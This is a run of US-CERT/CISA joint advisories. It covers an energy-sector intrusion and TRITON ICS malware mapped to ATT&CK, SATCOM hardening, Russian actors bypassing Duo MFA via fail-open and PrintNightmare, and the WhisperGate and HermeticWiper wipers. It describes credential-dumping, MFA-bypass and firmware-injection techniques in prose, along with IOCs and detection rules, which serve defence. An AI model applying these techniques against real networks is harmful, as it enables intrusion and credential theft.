Server Software Component: Web Shell [T1505.003] The threat actor created webshells on Energy Sector targets’ publicly accessible email and web servers. Detect: the portion of the webshell that is on the server may be small and look innocuous. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. Defense Evasion [TA0005] Indicator Removal on Host: Clear Windows Event Logs [T1070.001]

The threat actor created new accounts on victim networks to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. 

The threat actor also removed applications they installed while they were in the network along with any logs produced. For example, the VPN client installed at one third-party commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Create Account: Local Account [T1136.001]

Encrypt Sensitive Information: protect sensitive information with strong encryption.

Remote Data Storage: use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Indicator Removal on Host: File Deletion [T1070.004]

The threat actor cleaned up target networks by deleting created screenshots and specific registry keys. 

The threat actor also deleted all batch scripts, output text documents, and any tools they brought into the environment, such as scr.exe.

Note: this activity also applies to:

  • Technique: Modify Registry [T1112]
Monitor: monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.
  Technique: Masquerading [T1036] After downloading tools from a remote server, the threat actor renamed the extensions.

Restrict File and Directory Permissions: restrict access by setting directory and file permissions that are not specific to users or privileged accounts.

Code Signing: enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

Execution Prevention: block execution of code on a system through application control, and/or script blocking.

Credential Access [TA0006] Brute Force: Password Cracking [T1110.002]

The threat actor used password-cracking techniques to obtain the plaintext passwords from obtained credential hashes.

The threat actor dropped and executed open-source and free password cracking tools such as Hydra, SecretsDump, and CrackMapExec, and Python.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Password Policies: set and enforce secure password policies for accounts.

Forced Authentication [T1187] Microsoft Word attachments sent via spearphishing emails leveraged legitimate Microsoft Office functions for retrieving a document from a remote server over Server Message Block (SMB) using Transmission Control Protocol ports 445 or 139. As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.)

Password Policies: set and enforce secure password policies for accounts.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The threat actor’s watering hole sites contained altered JavaScript and PHP files that requested a file icon using SMB from an IP address controlled by the threat actors.

The threat actor manipulated LNK files to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actor exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.
 

Note: this activity also applies to:

  • Tactic: Persistence [TA0003], Technique: Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]
OS Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory [T1003.001] The threat actor used an Administrator PowerShell prompt to enable the WDigest authentication protocol to store plaintext passwords in the LSASS memory. With this enabled, credential harvesting tools can dump passwords from this process’s memory.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Password Policies: set and enforce secure password policies for accounts.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Privileged Process Integrity: protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Credential Access Protection: use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

OS Credential Dumping: NTDS [T1003.003] The threat actor collected the files ntds.dit. The file ntds.dit is the Active Directory (AD) database that contains all information related to the AD, including encrypted user passwords.

Monitor: monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.

Privileged Account Management: manage the creation of, modification of, se of, and permissions associated with privileged accounts, including SYSTEM and root.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Discovery [TA0007] Remote System Discovery [T1018]

The threat actor used privileged credentials to access the Energy Sector victim’s domain controller. Once on the domain controller, the threat actors used batch scripts dc.bat and dit.bat to enumerate hosts, users, and additional information about the environment. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Valid Accounts: Domain Accounts [T1078.002]
  • Tactic: Discovery [TA0007], Technique: System Owner/User Discovery [T1033]

Monitor: normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.

The threat actor accessed workstations and servers on corporate networks that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. 

The actor targeted and copied profile and configuration information for accessing ICS systems on the network. The threat actor copied Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems and took screenshots of a Human Machine Interface (HMI).

Note: this activity also applies to

  • Tactic: Discovery [TA0007], Technique File and Directory Discovery [T1083]
  • Tactic: [TA0009], Technique: Screen Capture [T1113]
File and Directory Discovery [T1083]

The actor used dirsb.bat to gather folder and file names from hosts on the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Command and Scripting Interpreter: Windows Command Shell [T1059.003]
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. The threat actor conducted reconnaissance operations within the network. The threat actor focused on identifying and browsing file servers within the intended victim’s network. Lateral Movement [TA0008] Lateral Tool Transfer [T1570]

The threat actor moved laterally via PsExec, batch scripts, RDP, VNC, and admin shares.

Note: this activity also applies to:

  • Tactic: Lateral Movement [TA0008], Techniques: 
    • Remote Services: Remote Desktop Protocol [T1021.001]
    • Remote Services: SMB/Windows Admin Shares [T1021.002]
    • Remote Services: VNC [T1021.005]

Network Intrusion Prevention: use intrusion detection signatures to block traffic at network boundaries.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification o, se of, and permissions associated with user accounts.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

Limit Software Installation: block users or groups from installing unapproved software.

Collection [TA0009] Data from Local System [T1005]  The threat actor collected the Windows SYSTEM registry hive file, which contains host configuration information.

Monitor: monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data.

Data may also be acquired through Windows system management tools such as WMI and PowerShell.

Archive Collected Data: Archive via Utility [T1560.001] The threat actor compressed the ntds.dit file and the SYSTEM registry hive they had collected into archives named SYSTEM.zip and comps.zip. Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. Screen Capture [T1113]

The threat actor used Windows’ Scheduled Tasks and batch scripts, to execute scr.exe and collect additional information from hosts on the network. The tool scr.exe is a screenshot utility that the threat actor used to capture the screen of systems across the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • Scheduled Task/Job: Scheduled Task [T1053.005]

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The actor used batch scripts labeled pss.bat and psc.bat to run the PsExec tool. PsExec was used to execute scr.exe across the network and to collect screenshots of systems in a text file.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • System Services: Service Execution [T1569.002]
Command and Control [TA0011] Ingress Tool Transfer [T1105] The threat actor downloaded tools from a remote server.    

Monitor: monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as File Transfer Protocol, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Use intrusion detection signatures to block traffic at network boundaries.

 

TRITON Malware

Table 4 maps TRITON’s capabilities to the ATT&CK for ICS framework. For mitigations to harden ICS/OT environments, refer to the Mitigations section of this advisory.

Table 4: ICS Domain Tactics and Techniques for TRITON [4]

Initial Access

Engineering Workstation Compromise [T0818]

TRITON compromises workstations within the safety network.  Execution

Change Operating Mode [T0858]

Note: this technique also applies to Evasion.

TRITON can halt or run a program through the TriStation protocol. (Note: TriStation protocol is the protocol that Triconex System software uses to communicate with the Tricon PLCs.) 

Execution through API [T0871]

TRITON leverages a custom implementation of the TriStation protocol, which triggers APIs related to program download, program allocation, and program changes.

Hooking [T0874]

Note: this technique also applies to Tactic: Privilege Escalation.

TRITON's injector modifies the address of the handler for a Tristation protocol command so that when the command is received, the payload may be executed instead of normal processing. Modify Controller Tasking [T0821] Some TRITON components are added to the program table on the Tricon so that they are executed by the firmware once each cycle. Native API [T0834] TRITON's payload takes commands from TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex), and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode. Scripting [T0853]

TRITON communicates with Triconex Tricon PLCs using its custom Python script. This Python script communicates using four Python modules that collectively implement the TriStation protocol via User Datagram Protocol (UDP) 1502.

Note: this use also applies to:

Persistence 

System Firmware [T0857]

Note: this technique also applies to Tactic: Inhibit Response Function.

TRITON's injector injects the payload into the Tricon PLCs’ running firmware. A threat actor can use the payload to read and write memory on the PLC and execute code at an arbitrary address within the firmware. If the memory address it writes to is within the firmware region, the malicious payload disables address translation, writes the code at the provided address, flushes the instruction cache, and re-enables address translation. This allows the malware to change the running firmware. Privilege Escalation Exploitation for Privilege Escalation [T0890] TRITON can gain supervisor-level access and control system states by exploiting a vulnerability. Evasion Exploitation for Evasion [T0820] TRITON's injector exploits a vulnerability in the device firmware to escalate privileges and then it disables and (later patches) a firmware RAM/ROM consistency check.  Indicator Removal on Host [T0872] After running the malicious payload, TRITON's Python script overwrites the malicious payload with a “dummy” program.

Masquerading [T0849]

TRITON’s Python script masquerades as legitimate Triconex software. TRITON’s injector masquerades as a standard compiled PowerPC program for the Triconex PLC. Discovery

Remote System Discovery [T0846]

TRITON’s Python script can autodetect Triconex PLCs on the network by sending a UDP broadcast packet over port 1502. Lateral Movement Program Download [T0843] TRITON leverages the TriStation protocol to download programs to the Tricon PLCs. Collection Detect Operating Mode [T0868] A TRITON Python module provides string representations of different features of the TriStation protocol, including message and error codes, key position states, and other values returned by the status functions.

Program Upload [T0845]

TRITON uploads its payload to the Tricon PLCs. Impair Process Control Unauthorized Command Message [T0855] A threat actor can use TRITON to prevent the Tricon PLC from functioning appropriately. Impact Loss of Safety [T0880] TRITON can reprogram the safety PLC logic to allow unsafe conditions or state to persist. Revisions
  • March 24, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-076A: Strengthening Cybersecurity of SATCOM Network Providers and Customers

US-CERT Security Alerts - Thu, 03/17/2022 - 11:00
Original release date: March 17, 2022 | Last revised: May 10, 2022
Summary

Updated May 10, 2022: The U.S. government attributes this threat activity to Russian state-sponsored malicious cyber actors. Additional information may be found in a statement from the State Department. For more information on Russian malicious cyber activity, refer to cisa.gov/uscert/russia.

Actions to Take Today:
• Use secure methods for authentication.
• Enforce principle of least privilege.
• Review trust relationships.
• Implement encryption.
• Ensure robust patching and system configuration audits.
• Monitor logs for suspicious activity.
• Ensure incident response, resilience, and continuity of operations plans are in place.

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers’ customer environments.

Given the current geopolitical situation, CISA’s Shields Up initiative requests that all organizations significantly lower their threshold for reporting and sharing indications of malicious cyber activity. To that end, CISA and FBI will update this joint Cybersecurity Advisory (CSA) as new information becomes available so that SATCOM providers and their customers can take additional mitigation steps pertinent to their environments.

CISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the mitigations outlined in this CSA to strengthen SATCOM network cybersecurity.

Click here for a PDF version of this report.

Mitigations

CISA and FBI strongly encourages critical infrastructure organizations and other organizations that are either SATCOM network providers or customers to review and implement the following mitigations:

Mitigations for SATCOM Network Providers
  • Put in place additional monitoring at ingress and egress points to SATCOM equipment to look for anomalous traffic, such as:
    • The presence of insecure remote access tools—such as Teletype Network Protocol (Telnet), File Transfer Protocol (FTP), Secure Shell Protocol (SSH), Secure Copy Protocol (SCP), and Virtual Network Computing (VNC)—facilitating communications to and from SATCOM terminals.
    • Network traffic from SATCOM networks to other unexpected network segments.
    • Unauthorized use of local or backup accounts within SATCOM networks.
    • Unexpected SATCOM terminal to SATCOM terminal traffic.
    • Network traffic from the internet to closed group SATCOM networks.
    • Brute force login attempts over SATCOM network segments.
  • See the Office of the Director of National Intelligence (ODNI) Annual Threat Assessment of the U.S. Intelligence Community, February 2022 for specific state-sponsored cyber threat activity relating to SATCOM networks.
Mitigations for SATCOM Network Providers and Customers
  • Use secure methods for authentication, including multifactor authentication where possible, for all accounts used to access, manage, and/or administer SATCOM networks. 
    • Use and enforce strong, complex passwords: Review password policies to ensure they align with the latest NIST guidelines
    • Do not use default credentials or weak passwords.
    • Audit accounts and credentials: remove terminated or unnecessary accounts; change expired credentials.
  • Enforce principle of least privilege through authorization policies. Minimize unnecessary privileges for identities. Consider privileges assigned to individual personnel accounts, as well as those assigned to non-personnel accounts (e.g., those assigned to software or systems). Account privileges should be clearly defined, narrowly scoped, and regularly audited against usage patterns.
  • Review trust relationships. Review existing trust relationships with IT service providers. Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data.  
    • Remove unnecessary trust relationships. 
    • Review contractual relationships with all service providers. Ensure contracts include appropriate provisions addressing security, such as those listed below, and that these provisions are appropriately leveraged: 
      • Security controls the customer deems appropriate. 
      • Provider should have in place appropriate monitoring and logging of provider-managed customer systems.
      • Customer should have in place appropriate monitoring of the service provider’s presence, activities, and connections to the customer network.
      • Notification of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider. See National Security Agency (NSA) Cybersecurity Advisory: Protecting VSAT Communications for guidance.
  • Strengthen the security of operating systems, software, and firmware.
    • Ensure robust vulnerability management and patching practices are in place and, after testing, immediately patch known exploited vulnerabilities included in CISA's living catalog of known exploited vulnerabilities. These vulnerabilities carry significant risk to federal agencies as well as public and private sectors entities. 
    • Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Regularly audit system configurations for misconfigurations and security weaknesses.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
    • Integrate SATCOM traffic into existing network security monitoring tools.
    • Review logs of systems behind SATCOM terminals for suspicious activity.
    • Ingest system and network generated logs into your enterprise security information and event management (SIEM) tool. 
    • Implement endpoint detection and response (EDR) tools where possible on devices behind SATCOM terminals, and ingest into the SIEM.
    • Expand and enhance monitoring of network segments and assets that use SATCOM.
    • Expand monitoring to include ingress and egress traffic transiting SATCOM links and monitor for suspicious or anomalous network activity. 
    • Baseline SATCOM network traffic to determine what is normal and investigate deviations, such as large spikes in traffic.
  • Create, maintain, and exercise a cyber incident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.
Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Resources Revisions
  • March 17, 2022: Initial Version
  • May 10, 2022: Added Atrribution

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability

US-CERT Security Alerts - Tue, 03/15/2022 - 06:00
Original release date: March 15, 2022 | Last revised: May 2, 2022
Summary

Multifactor Authentication (MFA): A Cybersecurity Essential
• MFA is one of the most important cybersecurity practices to reduce the risk of intrusions—according to industry research, users who enable MFA are up to 99 percent less likely to have an account compromised.
• Every organization should enforce MFA for all employees and customers, and every user should sign up for MFA when available.
• Organizations that implement MFA should review default configurations and modify as necessary, to reduce the likelihood that a sophisticated adversary can circumvent this control.

The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to warn organizations that Russian state-sponsored cyber actors have gained network access through exploitation of default MFA protocols and a known vulnerability. As early as May 2021, Russian state-sponsored cyber actors took advantage of a misconfigured account set to default MFA protocols at a non-governmental organization (NGO), allowing them to enroll a new device for MFA and access the victim network. The actors then exploited a critical Windows Print Spooler vulnerability, “PrintNightmare” (CVE-2021-34527) to run arbitrary code with system privileges. Russian state-sponsored cyber actors successfully exploited the vulnerability while targeting an NGO using Cisco’s Duo MFA, enabling access to cloud and email accounts for document exfiltration.

This advisory provides observed tactics, techniques, and procedures, indicators of compromise (IOCs), and recommendations to protect against Russian state-sponsored malicious cyber activity. FBI and CISA urge all organizations to apply the recommendations in the Mitigations section of this advisory, including the following:

  • Enforce MFA and review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Ensure inactive accounts are disabled uniformly across the Active Directory and MFA systems. 
  • Patch all systems. Prioritize patching for known exploited vulnerabilities.

For more general information on Russian state-sponsored malicious cyber activity, see CISA's Russia Cyber Threat Overview and Advisories webpage. For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure as well as additional mitigation recommendations, see joint CSA Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure and CISA's Shields Up Technical Guidance webpage.

Click here for a PDF version of this report.

For a downloadable copy of IOCs, see AA22-074A.stix.

Technical DetailsThreat Actor Activity

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 10. See Appendix A for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

As early as May 2021, the FBI observed Russian state-sponsored cyber actors gain access to an NGO, exploit a flaw in default MFA protocols, and move laterally to the NGO’s cloud environment.

Russian state-sponsored cyber actors gained initial access [TA0001] to the victim organization via compromised credentials [T1078] and enrolling a new device in the organization’s Duo MFA. The actors gained the credentials [TA0006] via brute-force password guessing attack [T1110.001], allowing them access to a victim account with a simple, predictable password. The victim account had been un-enrolled from Duo due to a long period of inactivity but was not disabled in the Active Directory. As Duo’s default configuration settings allow for the re-enrollment of a new device for dormant accounts, the actors were able to enroll a new device for this account, complete the authentication requirements, and obtain access to the victim network.  

Using the compromised account, Russian state-sponsored cyber actors performed privilege escalation [TA0004] via exploitation of the “PrintNightmare” vulnerability (CVE-2021-34527) [T1068] to obtain administrator privileges. The actors also modified a domain controller file, c:\windows\system32\drivers\etc\hosts, redirecting Duo MFA calls to localhost instead of the Duo server [T1556]. This change prevented the MFA service from contacting its server to validate MFA login—this effectively disabled MFA for active domain accounts because the default policy of Duo for Windows is to “Fail open” if the MFA server is unreachable. Note: “fail open” can happen to any MFA implementation and is not exclusive to Duo.

After effectively disabling MFA, Russian state-sponsored cyber actors were able to successfully authenticate to the victim’s virtual private network (VPN) as non-administrator users and make Remote Desktop Protocol (RDP) connections to Windows domain controllers [T1133]. The actors ran commands to obtain credentials for additional domain accounts; then using the method described in the previous paragraph, changed the MFA configuration file and bypassed MFA for these newly compromised accounts. The actors leveraged mostly internal Windows utilities already present within the victim network to perform this activity.  

Using these compromised accounts without MFA enforced, Russian state-sponsored cyber actors were able to move laterally [TA0008] to the victim’s cloud storage and email accounts and access desired content. 

Indicators of Compromise

Russian state-sponsored cyber actors executed the following processes:

  • ping.exe - A core Windows Operating System process used to perform the Transmission Control Protocol (TCP)/IP Ping command; used to test network connectivity to a remote host [T1018] and is frequently used by actors for network discovery [TA0007].
  • regedit.exe - A standard Windows executable file that opens the built-in registry editor [T1112].
  • rar.exe - A data compression, encryption, and archiving tool [T1560.001]. Malicious cyber actors have traditionally sought to compromise MFA security protocols as doing so would provide access to accounts or information of interest. 
  • ntdsutil.exe - A command-line tool that provides management facilities for Active Directory Domain Services. It is possible this tool was used to enumerate Active Directory user accounts [T1003.003].

Actors modified the c:\windows\system32\drivers\etc\hosts file to prevent communication with the Duo MFA server:

  • 127.0.0.1 api-<redacted>.duosecurity.com 

The following access device IP addresses used by the actors have been identified to date:

  • 45.32.137[.]94
  • 191.96.121[.]162
  • 173.239.198[.]46
  • 157.230.81[.]39 
Mitigations

The FBI and CISA recommend organizations remain cognizant of the threat of state-sponsored cyber actors exploiting default MFA protocols and exfiltrating sensitive information. Organizations should:

  • Enforce MFA for all users, without exception. Before implementing, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Ensure inactive accounts are disabled uniformly across the Active Directory, MFA systems etc.
  • Update software, including operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Continuously monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Implement security alerting policies for all changes to security-enabled accounts/groups, and alert on suspicious process creation events (ntdsutil, rar, regedit, etc.).

Note: If a domain controller compromise is suspected, a domain-wide password reset—including service accounts, Microsoft 365 (M365) synchronization accounts, and krbtgt—will be necessary to remove the actors’ access. (For more information, see https://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html). Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.  

FBI and CISA also recommend organizations implement the recommendations listed below to further reduce the risk of malicious cyber activity.

Security Best Practices
  • Deploy Local Administrator Password Solution (LAPS), enforce Server Message Block (SMB) Signing, restrict Administrative privileges (local admin users, groups, etc.), and review sensitive materials on domain controller’s SYSVOL share.
  • Enable increased logging policies, enforce PowerShell logging, and ensure antivirus/endpoint detection and response (EDR) are deployed to all endpoints and enabled.
  • Routinely verify no unauthorized system modifications, such as additional accounts and Secure Shell (SSH) keys, have occurred to help detect a compromise. To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system. 
Network Best Practices
  • Monitor remote access/ RDP logs and disable unused remote access/RDP ports.
  • Deny atypical inbound activity from known anonymization services, to include commercial VPN services and The Onion Router (TOR).
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Regularly audit administrative user accounts and configure access control under the concept of least privilege. 
  • Regularly audit logs to ensure new accounts are legitimate users.
  • Scan networks for open and listening ports and mediate those that are unnecessary.
  • Maintain historical network activity logs for at least 180 days, in case of a suspected compromise.
  • Identify and create offline backups for critical assets.
  • Implement network segmentation.
  • Automatically update anti-virus and anti-malware solutions and conduct regular virus and malware scans.
Remote Work Environment Best Practices

With an increase in remote work environments and the use of VPN services, the FBI and CISA encourage organizations to implement the following best practices to improve network security:

  • Regularly update VPNs, network infrastructure devices, and devices used for remote work environments with the latest software patches and security configurations.
  • When possible, implement multi-factor authentication on all VPN connections. Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, require employees engaging in remote work to use strong passwords.
  • Monitor network traffic for unapproved and unexpected protocols.
  • Reduce potential attack surfaces by discontinuing unused VPN servers that may be used as a point of entry for attackers.
User Awareness Best Practices

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI and CISA recommend the following best practices to improve employee operations security when conducting business:

  • Provide end-user awareness and training. To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and delivery methods. Also, provide users with training on information security principles and techniques. 
  • Inform employees of the risks associated with posting detailed career information to social or professional networking sites.
  • Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyberattack, to help quickly and efficiently identify threats and employ mitigation strategies.
Information Requested

All organizations should report incidents and anomalous activity to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov and/or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. 

APPENDIX A: Threat Actor Tactics and Techniques

See table 1 for the threat actors’ tactics and techniques identified in this CSA. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

Table 1: Threat Actor MITRE ATT&CK Tactics and Techniques

Tactic Technique Initial Access [TA0001] Valid Accounts [T1078] Persistence [TA0003] External Remote Services [T1133] Modify Authentication Process [T1556] Privilege Escalation [TA0004] Exploitation for Privilege Escalation
[T1068] Defense Evasion [TA0005] Modify Registry [T1112] Credential Access [TA0006] Brute Force: Password Guessing [T1110.001] OS Credential Dumping: NTDS [T1003.003] Discovery [TA0007] Remote System Discovery [T1018] Lateral Movement [TA0008]    Collection [TA0009] Archive Collected Data: Archive via Utility [T1560.001] Revisions
  • March 15, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-057A: Update: Destructive Malware Targeting Organizations in Ukraine

US-CERT Security Alerts - Sat, 02/26/2022 - 07:00
Original release date: February 26, 2022 | Last revised: April 28, 2022
Summary

Actions to Take Today:
• Set antivirus and antimalware programs to conduct regular scans.
• Enable strong spam filters to prevent phishing emails from reaching end users.
• Filter network traffic.
• Update software.
• Require multifactor authentication.

(Updated April 28, 2022) This advisory has been updated to include additional Indicators of Compromise (IOCs) for WhisperGate and technical details for HermeticWiper, IsaacWiper, HermeticWizard, and CaddyWiper destructive malware, all of which have been deployed against Ukraine since January 2022. Additional IOCs associated with WhisperGate are in the Appendix, and specific malware analysis reports (MAR) are hyperlinked below.  

(end of update)

Leading up to Russia’s unprovoked attack against Ukraine, threat actors deployed destructive malware against organizations in Ukraine to destroy computer systems and render them inoperable. 

  • On January 15, 2022, the Microsoft Threat Intelligence Center (MSTIC) disclosed that malware, known as WhisperGate, was being used to target organizations in Ukraine. According to Microsoft, WhisperGate is intended to be destructive and is designed to render targeted devices inoperable. 
  • On February 23, 2022, several cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record, which results in subsequent boot failure. 

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries. Organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for such an event. 

This joint Cybersecurity Advisory (CSA) between the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) provides information on WhisperGate and HermeticWiper malware as well as open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware. Additionally, this joint CSA provides recommended guidance and considerations for organizations to address as part of network architecture, security baseline, continuous monitoring, and incident response practices.

Download the Joint Cybersecurity Advisory: Update: Destructive Malware Targeting Organizations in Ukraine (pdf, 559kb).
Click here for STIX.

Technical Details

Threat actors have deployed destructive malware, including both WhisperGate and HermeticWiper, against organizations in Ukraine to destroy computer systems and render them inoperable. Listed below are high-level summaries of campaigns employing the malware. CISA recommends organizations review the resources listed below for more in-depth analysis and see the Mitigation section for best practices on handling destructive malware.   

On January 15, 2022, Microsoft announced the identification of a sophisticated malware operation targeting multiple organizations in Ukraine. The malware, known as WhisperGate, has two stages that corrupts a system’s master boot record, displays a fake ransomware note, and encrypts files based on certain file extensions. Note: although a ransomware message is displayed during the attack, Microsoft highlighted that the targeted data is destroyed, and is not recoverable even if a ransom is paid. See Microsoft’s blog on Destructive malware targeting Ukrainian organizations for more information and see the IOCs in table 1. 

